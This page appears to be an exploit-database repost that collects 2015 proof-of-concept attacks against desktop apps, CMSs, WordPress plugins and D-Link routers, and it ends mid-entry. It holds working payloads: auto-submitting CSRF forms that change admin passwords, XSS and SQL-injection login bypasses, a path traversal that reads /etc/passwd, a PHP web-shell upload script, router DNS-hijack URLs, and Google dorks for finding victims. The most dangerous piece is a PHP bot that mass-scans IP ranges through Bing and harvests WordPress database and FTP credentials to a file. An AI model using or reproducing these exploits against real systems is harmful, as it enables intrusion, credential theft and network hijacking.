HireHackking

# Exploit Title: foobar2000 1.3.8 (.m3u) Local Crash PoC # Date: 12-06-2015 # Exploit Author: 0neb1n # Vendor Homepage: http://www.foobar2000.org/ # Software Link: http://www.foobar2000.org/getfile/e246984718ab7ab58fa1e0b072ff05a4/foobar2000_v1.3.8.exe # Version: 1.3.8 # Tested on: Windows XP SP3 KOR file = "poc.m3u" data = 'http://' + '\x41' * 200000 fd = open(file, 'w') fd.write(data) fd.close() print "" print "[*] File successfully created !!" print "[*] Author : 0neb1n" print "[*] Mail : barcodecrow(at)gmail(dot)com"

#!/usr/bin/python # Exploit Title: GoldWave 6.1.2 (URL) Local Crash Exploit # Date: 12-06-2015 # Exploit Author: 0neb1n # Vendor Homepage: http://www.goldwave.com/ # Software Link: http://goldwave.com/downloads/InstallGoldWave612.exe # Version: 6.1.2 # Tested on: Windows 8.1 Home KR # Step 1 : Make poc.txt and copy "http://AAAAAAAA..." # Step 2 : run GoldWave 6.1.2 -> File -> Open URl -> Paste "http://AAAAAA..." # step 3 : Boom!! file = "poc.txt" data = 'http://' + '\x41' * 200000 fd = open(file, 'w') fd.write(data) fd.close() print "" print "[*] File successfully created !!" print "[*] Author : 0neb1n" print "[*] Mail : barcodecrow(at)gmail(dot)com"

# Exploit Title: CSRF, Persistent XSS & LFI # Google Dork: intitle: CSRF, Persistent XSS & LFI # Date: 2015-06-11 # Exploit Author: John Page ( hyp3rlinx ) # Website: hyp3rlinx.altervista.org # Vendor Homepage: kilrizzy.github.io/Nakid-CMS # Software Link: kilrizzy.github.io/Nakid-CMS # Version: kilrizzy-Nakid-CMS-f274624 # Tested on: windows 7 on XAMPP # Category: webapps Vendor: ================================ http://kilrizzy.github.io/Nakid-CMS/ Product: ================================ kilrizzy-Nakid-CMS-f274624 Nakid CMS is an open source content management system built using PHP and CodeIgniter. Setup mode: ========== Under root dir for Nakid CMS we set to production mode instead of development in index.php. e.g. define('ENVIRONMENT', 'production'); Advisory Information: ================================================ CSRF, Persistent XSS & Auth bypass LFI Vulnerability Details: ===================== Multiple CSRF(s) exist: We have ability to do the following as no CSRF tokens are present. 1-Change Admin password 2-Add arbitrary users to system 3-Alter system settings XSS (persistent): XSS parameter vulnerabilities exist for the following: payloads will be stored in the MySQL database and activated when a victim visits the vulnerable webpage. XSS URL: -------- http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users On the "Edit Record" pop up dialog box. Vulnerable parameters: --------------------- username password email fname lname XSS URL: -------- http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings On the "Edit Record" pop up dialog box. Vulnerable parameters: --------------------- from_name include_path primary_email from_email XSS URL: -------- http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1 Vulnerable parameter: -------------------- title Authentication bypass LFI: Local file inclusion to bypass access controls and read aribitrary files exist by setting '$url' PHP variable on following URL index.php/connector$url Exploit POC code(s): ==================== CSRF(s): ======== Condition: Pursuade victim to visit our webpage or click our link, if they have a session then we do our CSRF!. 1- Add arbitrary user to system -------------------------------- <!DOCTYPE> <html> <head> <script> function doit(){ var e=document.getElementById('ruinurlife') e.submit() } </script> </head> <body onLoad="doit()"> <form id="ruinurlife" action=" http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/users" method="post"> <input type="text" name="username" value="sum1" /> <input type="text" name="password" value="abc123" /> <input type="text" name="email" value="X@X.com"/> <input type="text" name="fname" value="sum"/> <input type="text" name="lname" value="1"/> <input type="text" name="oper" value="add"/> <input type="text" name="id" value="_empty"/> </form> </body> </html> 2-Change Admin password ------------------------ <!DOCTYPE> <html> <head> <script> function doit(){ var e=document.getElementById('ruinurlife') e.submit() } </script> </head> <body onLoad="doit()"> <form id="ruinurlife" action=" http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/profile" method="post"> <input type="text" name="username" value="admin" /> <input type="text" name="password" value="xyz123" /> <input type="text" name="email" value="hell@abyss.com"/> <input type="text" name="fname" value="hyp3r"/> <input type="text" name="lname" value="linx"/> <input type="text" name="action" value="edit_profile"/> <input type="text" name="submitbt" value="Save"/> </form> </body> </html> 3-Alter system settings ----------------------- <!DOCTYPE> <html> <head> <script> function doit(){ var e=document.getElementById('ruinurlife') e.submit() } </script> </head> <body onLoad="doit()"> <form id="ruinurlife" action=" http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/settings" method="post"> <input type="text" name="value" value="HELL@ABYSS.com" /> <input type="text" name="oper" value="edit" /> <input type="text" name="id" value="1"/> </form> </body> </html> XSS persistent POC code: ======================= Inject <script>alert(666)</script> into any of the following vulnerable fields described above using POST method. Need to highlight a row then click edit dialog box to edit settings. e.g. http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings from_name <------- <script>alert(666)</script> include_path primary_email from_email Authorization bypass LFI: ======================== 1- Logout, create a hell.txt file or whatever and put in 'htdocs' or web root, then visit the URL (change to suit your environment). 2- http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt OR try http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php Disclosure Timeline: ========================================================= Vendor Notification: NA June 11, 2015 : Public Disclosure Severity Level: ========================================================= High Description: ========================================================== Request Method(s): [+] GET & POST Vulnerable Product: [+] kilrizzy-Nakid-CMS-f274624 Vulnerable Parameter(s): [+] username password email fname lname from_name include_path primary_email from_email title connector$url Affected Area(s): [+] /system/users /system/profile /system/content_edit/ =============================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)

# Exploit title: Opsview 4.6.2 - Multiple XSS # Date: 07-06-2015 # Vendor homepage: www.opsview.com # Version: 4.6.2 # CVE: CVE-2015-4420 # Author: Dolev Farhi @dolevf # Tested On: Kali Linux + Windows 7 # Details: # -------- # Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version 1. Stored XSS through a malicious check plugin a. Create a plugin with the following content: #!/bin/bash echo '<script>alert("script0t0s")</script>' exit 2 b. create a new check and assign this plugin. c. once a host uses this check, navigate to the event page, the XSS will be injected. d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement. 2. Stored XSS in host profile a. add a host b. in the description of the host, add a description as the one below: <script>alert(document.cookie)</script> c. save settings d. once a user/admin views the host settings, XSS will be injected. 3. Reflected XSS in Test service check page. a. Add a new service check b. Test the new service check against any host and provide in the command line the following <script>alert("test")</script> c. the XSS will immediately reflect to the screen. response output: POST /state/service/166/exec HTTP/1.1 Host: 192.168.0.20 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview Content-Length: 105 Cookie: PHPSESSID= auth_tkt= Connection: keep-alive Pragma: no-cache Cache-Control: no-cache plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915

# Exploit Title: SQL Injection & Persistent XSS # Google Dork: intitle: SQL Injection & Persistent XSS # Date: 2015-06-12 # Exploit Author: John Page ( hyp3rlinx ) # Website: hyp3rlinx.altervista.org # Vendor Homepage: zencherry.com # Software Link: sourceforge.net/projects/zencherrycms # Version: 1.1 # Tested on: windows 7 on Apache Tomcat # Category: webapps Vendor: ============================================= http://zencherry.com/ http://sourceforge.net/projects/zencherrycms Product: ================================================== ZCMS 1.1 JavaServer Pages Content Management System Advisory Information: ============================== SQL Injection & Persistent XSS Vulnerability Details: ====================== SQL Injection (CVE-2015-7346): Login to admin area requires a password but is easily bypassed using classic SQLInjection method because application uses concatenated user input to construct SQL queries. ZCMS exploitable admin login code: ================================== squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users WHERE status = 0 AND username = '"+username+"' AND password = '"+request.getParameter("pass") +"' AND type = 1 ;"; So we just supply an Admin password like ---> HELL' OR '2'='2 which will resolve as true! SQL Inject XSS Payload: ======================= We can also inject persisten XSS payload directly to MySQL database subverting all character filtering leveraging existing SQLInjection vulnerabilities. Persistent XSS (CVE-2015-7347): =============== Another persistent XSS vector is here in author field for comments: http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number] Exploit code(s): =============== 1) Bypass admin login --------------------- localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login Enter 'admin' for username field Enter HELL' OR '2'='2 for the pass field 2) Inject XSS using SQL Injection --------------------------------- http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title= "<script>alert(1)</script> &content=<script>alert(1)</script>&author=<script>alert(1)</script> SATAN&visibility=1&type=1&comm=0 3) Persistent XSS field ----------------------- http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number] Inject <script>alert(666)</script> in author input field. Disclosure Timeline: ========================================================= Vendor Notification: NA June 12, 2015 : Public Disclosure Severity Level: ========================================================= High Description: ========================================================== Request Method(s): [+] GET & POST Vulnerable Product: [+] ZCMS_1.1 Vulnerable Parameter(s): [+] pass, title, content, author Affected Area(s): [+] Admin, CMS =============================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)

Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-06 Advisory: http://www.vapid.dhs.org/advisory.php?v=124 Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/ Vendor: https://profiles.wordpress.org/sedevelops/ Vendor Notified: 2015-06-06 Vendor Contact: https://profiles.wordpress.org/sedevelops/ Description: An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post. Vulnerability: The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../. This vulnerability doesn’t require authentication to the Wordpress site. File ./se-html5-album-audio-player/download_audio.php: 3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file']; 4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/'); 5 // make sure it's a file before doing anything! 6 if( is_file($file_name) && $is_in_uploads_dir !== false ) { 7 8 // required for IE 9 if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); } 10 11 // get the file mime type using the file extension 12 switch(strtolower(substr(strrchr($file_name, '.'), 1))) { 13 case 'pdf': $mime = 'application/pdf'; break; 14 case 'zip': $mime = 'application/zip'; break; 15 case 'jpeg': 16 case 'jpg': $mime = 'image/jpg'; break; 17 default: $mime = 'application/force-download'; 18 } 19 header('Pragma: public'); // required 20 header('Expires: 0'); // no cache 21 header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); 22 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT'); 23 header('Cache-Control: private',false); 24 header('Content-Type: '.$mime); 25 header('Content-Disposition: attachment; filename="'.basename($file_name).'"'); 26 header('Content-Transfer-Encoding: binary'); 27 header('Content-Length: '.filesize($file_name)); // provide file size 28 header('Connection: close'); 29 readfile($file_name); // push it out 30 exit(); The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory. CVEID: 2015-4414 OSVDB: Exploit Code: • $ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd

Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-07 Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms Vendor: Waters Edge Web Design and NetherWorks LLC Vendor Notified: 2015-06-08 Advisory: http://www.vapid.dhs.org/advisory.php?v=125 Vendor Contact: plugins@wordpress.org Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin. Vulnerability: There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system. Including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server. In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user: 1 <?php 2 3 $filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php"; 4 if (file_exists($filename)) { 5 include_once($filename); 6 } else { 7 include_once("../../../../wp-load.php"); 8 } 9 echo "Here"; 10 $image_file = $_FILES['gf_aviary_file']; 11 if($image_file['name']!=''){ 12 $max_file_size = 4*1024*1024; 13 $file_size = intval($image_file['size']); 14 if( $file_size > $max_file_size ){ 15 $msg = "File Size is too big."; 16 $error_flag = true; 17 } 18 $extension = strtolower(end(explode('.', $image_file['name']))); 19 $aa_options = get_option('gf_aa_options'); 20 $supported_files = $aa_options['supported_file_format']; 21 $supported_files = strtolower($supported_files); 22 if(!$error_flag && $supported_files != '' ){ 23 $supported_files = explode (',', $supported_files); 24 if(!in_array($extension, $supported_files)){ 25 $msg = "No Supported file."; 26 $error_flag = true; 27 } 28 } 29 if(!$error_flag){ 30 $wp_upload_dir = wp_upload_dir(); 31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){ 32 mkdir($wp_upload_dir['basedir'].'/gform_aviary'); 33 } 34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/'; 35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/'; 36 $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name' ]; 37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){ 38 $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na me']; 39 } 40 } 41 $return_obj = array('status' => 'success', 'message' => $file_url); 42 echo json_encode($return_obj); 43 } 44 ?> CVEID: 2015-4455 OSVDB: Exploit Code: <?php /*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */ /*Larry W. Cashdollar @_larry0 6/7/2015 shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php */ $target_url = 'http://server/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php'; $file_name_with_full_path = '/var/www/shell.php'; echo "POST to $target_url $file_name_with_full_path"; $post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$target_url); curl_setopt($ch, CURLOPT_POST,1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $result=curl_exec ($ch); curl_close ($ch); echo "<hr>"; echo $result; echo "<hr>"; ?>

D-Link DSL-2730B AU_2.01 Authentication Bypass DNS Change Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg Disclaimer: This or previous programs is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's responsibility. Use them at your own risk! This security hole allows an attacker to bypass authentication and change the DNS. When the administrator is logged in the web management interface, an attacker may be able to completely bypass authentication phase and connect to the web management interface with administrator's credentials. This attack can also be performed by an external attacker who connects to the router's public IP address, if remote management is enabled. To change the DNS without logging into web management interface use the following URL: http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=

<!-- # Exploit title: Microsoft Internet Explorer 11 Crash PoC # Date: 07.06.2015 # Vulnerable version: 11 (newest at the time 11.0.9600.17801) # Tested on: Windows 7/8.1 # Author: Pawel Wylecial # http://howl.overflow.pl @h0wlu --> <html> <head> <meta http-equiv="Cache-Control" content="no-cache"/> <script> function boom() { var divA = document.createElement("div"); document.body.appendChild(divA); try { //divA.contentEditable = "true"; divA.outerHTML = "AAAA"; var context = divA['msGetInputContext'](); } catch (exception) { } } </script> </head> <body onload='boom();'> </body> </html> <!-- (2534.480c): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98 eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 MSHTML!Tree::ElementNode::GetCElement: 5f302e86 f7410800001000 test dword ptr [ecx+8],100000h ds:002b:00000008=???????? -->

D-Link DSL-526B ADSL2+ AU_2.01 Unauthenticated Remote DNS Change Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg No description for morons, script kiddies & noobs !! Disclaimer: This or previous programs is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's responsibility. Use them at your own risk! [todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2" var dns2 = '8.8.8.8';

# Exploit Title: wp-imagezoom Remote Image Upload # Google Dork: filetype:php inurl:"/wp-content/plugins/wp-imagezoom" & inurl:"?id=" # Date: 06.06.2015 # Exploit Author: T3N38R15 # Software Link: https://downloads.wordpress.org/plugin/wp-imagezoom.1.1.0.zip # Version: 1.1.0 # Tested on: Windows (Firefox) Linux (Firefox) The affected file is the div_img.php it allowed anybody to upload jpg files. /wp-content/plugins/wp-imagezoom/div_img.php?src=http://domain.com/img.jpg&cl=100&dl=100 would upload the file to the default directory : /wp-content/plugins/wp-imagezoom/work/http_cln__sls__sls_domain.com_sls_img.jpg/ the first one is then your picture ( it is only 469x469 the rest is cut out ), the other are zoomed/cuttet version of it. it also support a FPD : http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src= the variable org_img have the value of the current location to the work directory. We can also delete entry's with http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd= following options are avaliable for the cmd parameter : http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delall http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delunn http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delone&src=yourwisheddeleted http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delovr&maxsize=size of image Proof of concept : http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=http://static.zerochan.net/Frankenstein.(Noblesse).full.415661.jpg&cl=100&dl=100 Greets to Team Madleets/leets.pro & VIRkid ;) Regards T3N38R15

========================================================= [+] Title :- Pasworld detail.php Blind Sql Injection Vulnerability [+] Date :- 5 - June - 2015 [+] Vendor Homepage: :- http://main.pasworld.co.th/ [+] Version :- All Versions [+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows [+] Category :- webapps [+] Google Dorks :- intext:"Powered By :: PAS World Communitcation" inurl:detail.php site:go.th inurl:"detail.php?id=" [+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN) [+] Team name :- Team Alastor Breeze [+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R [+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha [+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com ========================================================= [+] Severity Level :- High [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- detail.php?id= [+] Affected Area(s) :- Entire admin, database, Server ========================================================= [+] About :- Unauthenticated SQL Injection via "detail.php?id=" parameter [+] SQL vulnerable File :- /home/DOMAIN/domains/DOMAIN.go.th/public_html/detail.php [+] POC :- http://127.0.0.1/detail.php?id=[SQL]' SQLMap ++++++++++++++++++++++++++ python sqlmap.py --url "http://127.0.0.1/detail.php?id=[SQL]" --dbs ++++++++++++++++++++++++++ Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=152 AND 1414=1414 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=152 AND (SELECT 1163 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (CASE WHEN (1163=1163) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (random number) - 9 columns Payload: id=-7470 UNION ALL SELECT 5982,5982,5982,5982,5982,CONCAT(0x7162766271,0x4b437a4a565555674571,0x7162707671),5982,5982,5982# =========================================================

###################################################################################### # Exploit Title: Wordpress Plugin 'WP Mobile Edition' LFI Vulnerability # # Date: june 6, 2015 # # Exploit Author: ViRuS OS # # Google Dork: inurl:?fdx_switcher=mobile # # Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/ # # Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip # # Version: WP Mobile Edition Version 2.2.7 # # Tested on : windows # ###################################################################################### Description : Wordpress Plugin 'WP Mobile Edition' is not filtering data so we can get the configration file in the path < site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php> # Exploite Code : <?php //ViRuS OS set_time_limit(0); error_reporting(0); echo "############### Fdx_Switcher MiniBot By ip Range ##################\n\n"; print " Coded By _ __ _(_)_ __ _ _ ___ ___ ___ \ \ / / | '__| | | / __| / _ \/ __| \ V /| | | | |_| \__ \ | (_) \__ \ \_/ |_|_| \__,_|___/ \___/|___/ Greets >> CoderLeeT | Fallag Gassrini | Taz| S4hk | Sir Matrix | Kuroi'SH "; echo "Follow Me On FaceBook : https://www.facebook.com/VirusXOS\n\n"; echo "Follow Me On FaceBook : https://www.facebook.com/Weka.Mashkel007\n\n"; echo "#################### Welcome Master ViRuS OS ################\n\n"; echo "Server Target IP : "; $ip=trim(fgets(STDIN,1024)); $ip = explode('.',$ip); $ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.'; for($i=0;$i <= 255;$i++) { $sites = array_map("site", bing("ip:$ip.$i wordpress")); $un=array_unique($sites); echo "[+] Scanning -> ", $ip.$i, ""."\n"; echo "Found : ".count($sites)." sites\n\n"; foreach($un as $pok){ $host=findit($file,"DB_HOST', '","');"); $db=findit($file,"DB_NAME', '","');"); $us=findit($file,"DB_USER', '","');"); $pw=findit($file,"DB_PASSWORD', '","');"); $bda="http://$pok"; $linkof='/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'; $dn=($bda).($linkof); $file=@file_get_contents($dn); if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){ echo "[+] Scanning => ".$bda."\n\n"; echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n"; echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n"; echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n"; echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n"; $db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n"; $user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n"; $pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n"; $host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n"; $ux = "".$bda."\r\n"; $ux1 = "".$db."\r\n"; $ux2 = "".$user."\r\n"; $ux3 = "".$pass."\r\n"; $ux4 = "".$host."\r\n"; $save=fopen('exploited.txt','ab'); fwrite($save,"$ux"); fwrite($save,"$ux1"); fwrite($save,"$ux2"); fwrite($save,"$ux3"); fwrite($save,"$ux4"); } elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){ echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n"; echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n"; echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n"; } else{echo $bda." : Exploit failed \n\n";} } } function findit($mytext,$starttag,$endtag) { $posLeft = stripos($mytext,$starttag)+strlen($starttag); $posRight = stripos($mytext,$endtag,$posLeft+1); return substr($mytext,$posLeft,$posRight-$posLeft); } function site($link){ return str_replace("","",parse_url($link, PHP_URL_HOST)); } function bing($what){ for($i = 1; $i <= 2000; $i += 10){ $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE"); curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)"); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt'); curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt'); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); $data = curl_exec($ch); preg_match_all('#;a=(.*?)" h="#',$data, $links); foreach($links[1] as $link){ $allLinks[] = $link; } if(!preg_match('#"sw_next"#',$data)) break; } if(!empty($allLinks) && is_array($allLinks)){ return array_unique(array_map("urldecode", $allLinks)); } } ?>

<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> | Exploit Title: Milw0rm Clone Script v1.0 - (time based) SQLi | | Date: 05.19.2015 | | Exploit Daddy: pancaker | | Vendor Homepage: http://milw0rm.sourceforge.net/ | | Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download | | Version: v1.0 | | Tested On: Ubuntu 10.04 | |><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><| | SHOUTout: milw0rm &&& your mums pancakes | | CALLINGout: hak5 {crap to the core} &&& 1337day/inj3ct0r {scamm3rs + l33ch3rs} | <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> ### vuln codez related.php ### <? include("include/functions.php"); $related = htmlspecialchars(trim($_GET['program'])); <-- this isnt going to save u $query = mysql_query("SELECT * FROM `exploits` WHERE `r`='".$related."'"); <- might as well b a straight get request lololol owned $row = mysql_num_rows($query); if($row){ ?> <html> <head> <title><? echo SiteInfo('site_name');?> - exploits : vulnerabilities : videos : papers : shellcode</title> ..zzz... ### manual ### root@woop:~# zzz='10' root@woop:~# lulz="program=hak5'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP($zzz)))a)%20AND%20'shit'='shit" root@woop:~# time curl "http://localhost/milw0rm/related.php?$lulz" real 0m10.008s user 0m0.004s sys 0m0.004s ### sqlmap ### root@woop:~/sqlmap# python sqlmap.py -u 'http://localhost/milw0rm/related.php?program=lol' --current-user --is-dba _ ___ ___| |_____ ___ ___ {1.0-dev-e8f87bf} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:46:53 [09:46:53] [INFO] resuming back-end DBMS 'mysql' [09:46:53] [INFO] testing connection to the target URL [09:46:53] [INFO] heuristics detected web page charset 'UTF-8' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: program (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: program=lol' AND (SELECT * FROM (SELECT(SLEEP(5)))yYCj) AND 'mQUB'='mQUB Type: UNION query Title: MySQL UNION query (NULL) - 8 columns Payload: program=lol' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x77775a6355684c45565a,0x7176717671),NULL,NULL,NULL,NULL,NULL,NULL# --- [09:46:53] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) web application technology: PHP 5.3.2, Apache 2.2.14 back-end DBMS: MySQL 5.0.12 [09:46:53] [INFO] fetching current user current user: 'root@localhost' [09:46:53] [INFO] testing if current user is DBA [09:46:53] [INFO] fetching current user [09:46:53] [WARNING] reflective value(s) found and filtering out current user is DBA: True [09:46:53] [INFO] fetched data logged to text files under '/root/.sqlmap/output/localhost' <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> | >>> THIS 